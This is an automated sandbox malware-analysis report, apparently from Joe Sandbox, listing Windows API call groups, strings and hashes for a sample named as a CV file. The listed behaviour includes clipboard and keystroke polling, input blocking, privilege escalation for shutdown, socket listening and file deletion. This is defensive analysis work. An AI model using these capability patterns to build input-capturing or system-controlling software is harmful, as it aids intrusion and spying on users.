                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                            • String ID: \*.*
                                                                                            • API String ID: 1917200108-1173974218
                                                                                            • Opcode ID: e306b6fd309cca7c6f14aa876bf2326555bfe44d767ac9eac40463d32b53a4a9
                                                                                            • Instruction ID: e883a4c827790b8811fded2641e628e96a97fbfc4cc01d36b9966883a7a18e8f
                                                                                            • Opcode Fuzzy Hash: e306b6fd309cca7c6f14aa876bf2326555bfe44d767ac9eac40463d32b53a4a9
                                                                                            • Instruction Fuzzy Hash: 435120B290811CAACB21EB91DC45DEF77BCAF15300F0501EAE585E2181DFB697998FA4
                                                                                            APIs
                                                                                            • OpenClipboard.USER32(0015DC00), ref: 00116B36
                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00116B44
                                                                                            • GetClipboardData.USER32(0000000D), ref: 00116B4C
                                                                                            • CloseClipboard.USER32 ref: 00116B58
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00116B74
                                                                                            • CloseClipboard.USER32 ref: 00116B7E
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00116B93
                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00116BA0
                                                                                            • GetClipboardData.USER32(00000001), ref: 00116BA8
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00116BB5
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00116BE9
                                                                                            • CloseClipboard.USER32 ref: 00116CF6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                            • String ID:
                                                                                            • API String ID: 3222323430-0
                                                                                            • Opcode ID: 1ae0728d711522d4515436ee12e686d8fe6f3d2b241be8f24026f0ae363c5091
                                                                                            • Instruction ID: 7f0ec5581e8a46c48f26d68d4da33ec40d18be2b6067f51cf893bbc7d62c71fd
                                                                                            • Opcode Fuzzy Hash: 1ae0728d711522d4515436ee12e686d8fe6f3d2b241be8f24026f0ae363c5091
                                                                                            • Instruction Fuzzy Hash: 1551D035204201ABD708EF60EC46FAE77A8EF95B00F01012DFA9AD31E1DF71D9858B62
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0010F62B
                                                                                            • FindClose.KERNEL32(00000000), ref: 0010F67F
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0010F6A4
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0010F6BB
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0010F6E2
                                                                                            • __swprintf.LIBCMT ref: 0010F72E
                                                                                            • __swprintf.LIBCMT ref: 0010F767
                                                                                            • __swprintf.LIBCMT ref: 0010F7BB
                                                                                              • Part of subcall function 000E172B: __woutput_l.LIBCMT ref: 000E1784
                                                                                            • __swprintf.LIBCMT ref: 0010F809
                                                                                            • __swprintf.LIBCMT ref: 0010F858
                                                                                            • __swprintf.LIBCMT ref: 0010F8A7
                                                                                            • __swprintf.LIBCMT ref: 0010F8F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                            • API String ID: 835046349-2428617273
                                                                                            • Opcode ID: c0f2585ea806ec7abba0422852b15ff4fb0cbe904b963e317670f1598141d350
                                                                                            • Instruction ID: 0d6709c49a0b2e0cfa6b5213da5c27886f9473ae4e562c4f0b53ff2a1b2c7279
                                                                                            • Opcode Fuzzy Hash: c0f2585ea806ec7abba0422852b15ff4fb0cbe904b963e317670f1598141d350
                                                                                            • Instruction Fuzzy Hash: FAA121B2408344ABD310EB95C896EEFB7ECBF98704F44092EF595C2192EB34D949C762
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00111B50
                                                                                            • _wcscmp.LIBCMT ref: 00111B65
                                                                                            • _wcscmp.LIBCMT ref: 00111B7C
                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00111B8E
                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00111BA8
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00111BC0
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111BCB
                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00111BE7
                                                                                            • _wcscmp.LIBCMT ref: 00111C0E
                                                                                            • _wcscmp.LIBCMT ref: 00111C25
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00111C37
                                                                                            • SetCurrentDirectoryW.KERNEL32(001739FC), ref: 00111C55
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00111C5F
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111C6C
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111C7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                            • String ID: *.*
                                                                                            • API String ID: 1803514871-438819550
                                                                                            • Opcode ID: 703f38a3f1aaab8cb250cb23259a80cf865702b8eac978ebe244bdb4b1fe3273
                                                                                            • Instruction ID: 754a8a584448cf067bd8ea05b23642f7a0662533e72b89fda270a44b62649d91
                                                                                            • Opcode Fuzzy Hash: 703f38a3f1aaab8cb250cb23259a80cf865702b8eac978ebe244bdb4b1fe3273
                                                                                            • Instruction Fuzzy Hash: C5319536640619BEDF149BA0EC49BDEB7BC9F06324F1045A5EA15E30A0EB70DAC58A64
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00111CAB
                                                                                            • _wcscmp.LIBCMT ref: 00111CC0
                                                                                            • _wcscmp.LIBCMT ref: 00111CD7
                                                                                              • Part of subcall function 00106BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00106BEF
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00111D06
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111D11
                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00111D2D
                                                                                            • _wcscmp.LIBCMT ref: 00111D54
                                                                                            • _wcscmp.LIBCMT ref: 00111D6B
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00111D7D
                                                                                            • SetCurrentDirectoryW.KERNEL32(001739FC), ref: 00111D9B
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00111DA5
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111DB2
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111DC2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                            • String ID: *.*
                                                                                            • API String ID: 1824444939-438819550
                                                                                            • Opcode ID: 8a0e42f16eb26c8784ae784bd46bca9c7fb394032821c7c0e9c5d1cca4d25fc5
                                                                                            • Instruction ID: b2af97a87e28475c5791cf7a0b8dae4633f1381604f3bad8bef5d0f41c24aca2
                                                                                            • Opcode Fuzzy Hash: 8a0e42f16eb26c8784ae784bd46bca9c7fb394032821c7c0e9c5d1cca4d25fc5
                                                                                            • Instruction Fuzzy Hash: EE31E83650061ABEDF18EFE0FC09ADEB7AD9F46324F1045A5EA11A30A1DB70DBC58B54
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: _memset
                                                                                            • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                            • API String ID: 2102423945-2023335898
                                                                                            • Opcode ID: 2db1ac4ee8c73dbe160145e21131f428646a192edde509d4a06ea33aea5aed97
                                                                                            • Instruction ID: 091c5278ce919e202e2bedb85bccd98908825abd7f9bdcb324d33e5b98b359f8
                                                                                            • Opcode Fuzzy Hash: 2db1ac4ee8c73dbe160145e21131f428646a192edde509d4a06ea33aea5aed97
                                                                                            • Instruction Fuzzy Hash: 97828071D04219DBCB24CF98C881BEDBBB1BF48314F2581AED859AB391E7749D85CB90
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?), ref: 001109DF
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001109EF
                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001109FB
                                                                                            • __wsplitpath.LIBCMT ref: 00110A59
                                                                                            • _wcscat.LIBCMT ref: 00110A71
                                                                                            • _wcscat.LIBCMT ref: 00110A83
                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00110A98
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00110AAC
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00110ADE
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00110AFF
                                                                                            • _wcscpy.LIBCMT ref: 00110B0B
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00110B4A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                            • String ID: *.*
                                                                                            • API String ID: 3566783562-438819550
                                                                                            • Opcode ID: 85d239bfac12ae2d5123de5257badeaefee4f3e532c243bfdceb4371f690ddd3
                                                                                            • Instruction ID: a71a666533f09f55176a1e7d9f8f0102599cf295672a751ac29119f0cad43c6b
                                                                                            • Opcode Fuzzy Hash: 85d239bfac12ae2d5123de5257badeaefee4f3e532c243bfdceb4371f690ddd3
                                                                                            • Instruction Fuzzy Hash: A46159765082059FCB14DF60C844EAEB3E8FF99314F04492EF989D7252DB71EA85CB92
                                                                                            APIs
                                                                                              • Part of subcall function 000FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000FABD7
                                                                                              • Part of subcall function 000FABBB: GetLastError.KERNEL32(?,000FA69F,?,?,?), ref: 000FABE1
                                                                                              • Part of subcall function 000FABBB: GetProcessHeap.KERNEL32(00000008,?,?,000FA69F,?,?,?), ref: 000FABF0
                                                                                              • Part of subcall function 000FABBB: HeapAlloc.KERNEL32(00000000,?,000FA69F,?,?,?), ref: 000FABF7
                                                                                              • Part of subcall function 000FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000FAC0E
                                                                                              • Part of subcall function 000FAC56: GetProcessHeap.KERNEL32(00000008,000FA6B5,00000000,00000000,?,000FA6B5,?), ref: 000FAC62
                                                                                              • Part of subcall function 000FAC56: HeapAlloc.KERNEL32(00000000,?,000FA6B5,?), ref: 000FAC69
                                                                                              • Part of subcall function 000FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000FA6B5,?), ref: 000FAC7A
                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000FA6D0
                                                                                            • _memset.LIBCMT ref: 000FA6E5
                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000FA704
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 000FA715
                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 000FA752
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000FA76E
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 000FA78B
                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000FA79A
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 000FA7A1
                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000FA7C2
                                                                                            • CopySid.ADVAPI32(00000000), ref: 000FA7C9
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000FA7FA
                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000FA820
                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000FA834
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3996160137-0
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                            • API String ID: 0-4052911093
                                                                                            APIs
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00105FA6,?), ref: 00106ED8
                                                                                              • Part of subcall function 001072CB: GetFileAttributesW.KERNEL32(?,00106019), ref: 001072CC
                                                                                            • _wcscat.LIBCMT ref: 00106441
                                                                                            • __wsplitpath.LIBCMT ref: 0010645F
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00106474
                                                                                            • _wcscpy.LIBCMT ref: 001064A3
                                                                                            • _wcscat.LIBCMT ref: 001064B8
                                                                                            • _wcscat.LIBCMT ref: 001064CA
                                                                                            • DeleteFileW.KERNEL32(?), ref: 001064DA
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 001064EB
                                                                                            • FindClose.KERNEL32(00000000), ref: 00106506
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                            • String ID: \*.*
                                                                                            • API String ID: 2643075503-1173974218
                                                                                            APIs
                                                                                              • Part of subcall function 00123C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0012328E
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0012332D
                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001233C5
                                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00123604
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00123611
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1240663315-0
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?), ref: 00102B5F
                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00102BE0
                                                                                            • GetKeyState.USER32(000000A0), ref: 00102BFB
                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00102C15
                                                                                            • GetKeyState.USER32(000000A1), ref: 00102C2A
                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00102C42
                                                                                            • GetKeyState.USER32(00000011), ref: 00102C54
                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00102C6C
                                                                                            • GetKeyState.USER32(00000012), ref: 00102C7E
                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00102C96
                                                                                            • GetKeyState.USER32(0000005B), ref: 00102CA8
                                                                                            Similarity
                                                                                            • API ID: State$Async$Keyboard
                                                                                            • String ID:
                                                                                            • API String ID: 541375521-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1737998785-0
                                                                                            APIs
                                                                                              • Part of subcall function 000F9ABF: CLSIDFromProgID.OLE32 ref: 000F9ADC
                                                                                              • Part of subcall function 000F9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 000F9AF7
                                                                                              • Part of subcall function 000F9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 000F9B05
                                                                                              • Part of subcall function 000F9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000F9B15
                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0011C235
                                                                                            • _memset.LIBCMT ref: 0011C242
                                                                                            • _memset.LIBCMT ref: 0011C360
                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0011C38C
                                                                                            • CoTaskMemFree.OLE32(?), ref: 0011C397
                                                                                            Strings
                                                                                            • NULL Pointer assignment, xrefs: 0011C3E5
                                                                                            Similarity
                                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                            • String ID: NULL Pointer assignment
                                                                                            • API String ID: 1300414916-2785691316
                                                                                            APIs
                                                                                              • Part of subcall function 000FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000FB180
                                                                                              • Part of subcall function 000FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000FB1AD
                                                                                              • Part of subcall function 000FB134: GetLastError.KERNEL32 ref: 000FB1BA
                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00107A0F
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                            • String ID: $@$SeShutdownPrivilege
                                                                                            • API String ID: 2234035333-194228
                                                                                            APIs
                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00118CA8
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118CB7
                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00118CD3
                                                                                            • listen.WSOCK32(00000000,00000005), ref: 00118CE2
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118CFC
                                                                                            • closesocket.WSOCK32(00000000), ref: 00118D10
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                            • String ID:
                                                                                            • API String ID: 1279440585-0
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00106554
                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00106564
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00106583
                                                                                            • __wsplitpath.LIBCMT ref: 001065A7
                                                                                            • _wcscat.LIBCMT ref: 001065BA
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001065F9
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                            • String ID:
                                                                                            • API String ID: 1605983538-0
                                                                                            APIs
                                                                                              • Part of subcall function 0011A82C: inet_addr.WSOCK32(00000000), ref: 0011A84E
                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00119296
                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000), ref: 001192B9
                                                                                            Similarity
                                                                                            • API ID: ErrorLastinet_addrsocket
                                                                                            • String ID:
                                                                                            • API String ID: 4170576061-0
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0010EB8A
                                                                                            • _wcscmp.LIBCMT ref: 0010EBBA
                                                                                            • _wcscmp.LIBCMT ref: 0010EBCF
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0010EBE0
                                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0010EC0E
                                                                                            Similarity
                                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 2387731787-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                            • String ID:
                                                                                            • API String ID: 292994002-0
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                            • API String ID: 0-1546025612
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000DE014,75920AE0,000DDEF1,0015DC38,?,?), ref: 000DE02C
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000DE03E
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                            • API String ID: 2574300362-192647395
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001013DC
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: lstrlen
                                                                                            • String ID: ($|
                                                                                            • API String ID: 1659193697-1631851259
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 000DB22F
                                                                                              • Part of subcall function 000DB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 000DB5A5
                                                                                            Similarity
                                                                                            • API ID: Proc$LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2749884682-0
                                                                                            APIs
                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001143BF,00000000), ref: 00114FA6
                                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00114FD2
                                                                                            Similarity
                                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                                            • String ID:
                                                                                            • API String ID: 599397726-0
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0010E20D
                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0010E267
                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0010E2B4
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                            APIs
                                                                                              • Part of subcall function 000DF4EA: std::exception::exception.LIBCMT ref: 000DF51E
                                                                                              • Part of subcall function 000DF4EA: __CxxThrowException@8.LIBCMT ref: 000DF533
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000FB180
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000FB1AD
                                                                                            • GetLastError.KERNEL32 ref: 000FB1BA
                                                                                            Similarity
                                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00106623
                                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00106664
                                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0010666F
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00107223
                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0010723A
                                                                                            • FreeSid.ADVAPI32(?), ref: 0010724A
                                                                                            Similarity
                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0010F599
                                                                                            • FindClose.KERNEL32(00000000), ref: 0010F5C9
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0011BE6A,?,?,00000000,?), ref: 0010CEA7
                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0011BE6A,?,?,00000000,?), ref: 0010CEB9
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastMessage
                                                                                            APIs
                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00104153
                                                                                            • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00104166
                                                                                            Similarity
                                                                                            • API ID: InputSendkeybd_event
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000FACC0), ref: 000FAB99
                                                                                            • CloseHandle.KERNEL32(?,?,000FACC0), ref: 000FABAB
                                                                                            Similarity
                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,000E6DB3,-0000031A,?,?,00000001), ref: 000E81B1
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000E81BA
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            Similarity
                                                                                            • API ID: _memmove
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d909d435e3e22ee98aa17a39ca6162742eb3360a51bbce2498f36e57764352f
                                                                                            • Instruction ID: 76879f245c90659f28ba4f967ad7de6e162f7a4ed0f8e35d991ff016aab5abec
                                                                                            • Opcode Fuzzy Hash: 4d909d435e3e22ee98aa17a39ca6162742eb3360a51bbce2498f36e57764352f
                                                                                            • Instruction Fuzzy Hash: F1320222D29F418DD7239635DC22335A688EFB73D5F15D727E819B9EAAEB29C4C34100
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __itow__swprintf
                                                                                            APIs
                                                                                            • __time64.LIBCMT ref: 0010B6DF
                                                                                              • Part of subcall function 000E344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0010BDC3,00000000,?,?,?,?,0010BF70,00000000,?), ref: 000E3453
                                                                                              • Part of subcall function 000E344A: __aulldiv.LIBCMT ref: 000E3473
                                                                                            Similarity
                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                            APIs
                                                                                            • BlockInput.USER32(00000001), ref: 00116ACA
                                                                                            Similarity
                                                                                            • API ID: BlockInput
                                                                                            APIs
